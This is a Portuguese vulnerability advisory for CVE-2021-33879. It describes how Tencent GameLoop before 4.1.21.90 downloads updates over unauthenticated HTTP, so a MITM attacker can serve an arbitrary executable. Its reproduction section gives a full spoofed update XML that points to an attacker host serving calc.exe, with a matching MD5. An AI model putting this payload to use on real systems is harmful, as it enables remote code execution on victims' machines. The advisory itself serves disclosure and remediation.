
Atualização GameLoop MITM
CVEID: CVE-2021-33879
Nome do(s) produto(s) afetado(s) e versão(ões): GameLoop (todas as versões anteriores a 4.1.21.90)
Tipo de vulnerabilidade: CWE-494: Download de código sem verificação de integridade
Resumo
GameLoop é um emulador de Android desenvolvido pela Tencent. Ele possui um mecanismo de atualização que não é criptografado ou autenticado (além de hashes MD5 que, neste exploit, podem ser controlados pelo atacante), permitindo que um atacante em posição de MITM intercepte e envie seus próprios pacotes de atualização, que serão executados na máquina da vítima.
Descrição
O Tencent GameLoop anterior à versão 4.1.21.90 baixava atualizações por meio de uma conexão HTTP insegura. Um atacante malicioso em posição de MITM poderia falsificar o conteúdo de um documento XML que descreve um pacote de atualização, substituindo uma URL de download por uma que aponte para um executável Windows arbitrário. Como a única verificação de integridade seria a comparação do checksum MD5 do arquivo baixado com o contido no documento XML, o executável baixado seria então executado na máquina da vítima.
Reprodução
<?xml version="1.0" encoding="utf-8"?>
<UpdateConfig>
<GlobalConfig>
<Item name="UpdateEnable" Value="1" />
</GlobalConfig>
<UpdatePolicy>
<PolicyItem id="1" Enable="1" AutoUpdateRate="1" ManualUpdateRate="100" MatchUpdateOperation="2" Weight="4">
<Condition Method="Or">
<MatchSupplyId Type="market" MatchResult="0" Start="3.10.199.100" End="4.99.999.999" />
</Condition>
</PolicyItem>
</UpdatePolicy>
<UpdateOperation>
<OperItem id="2" inherit="0" Desc="This is a malicious update" Title="Malicious update" text="I could serve you ransomware but I'll just spawn calc">
<Item Type="market" url="http://attacker.local/calc.exe" md5="c4cb4fdf6369dd1342d2666171866ce5" version="5.10.199.100" filesize="32768" />
</OperItem>
</UpdateOperation>
</UpdateConfig>


Correção
Instale uma versão mais recente do GameLoop.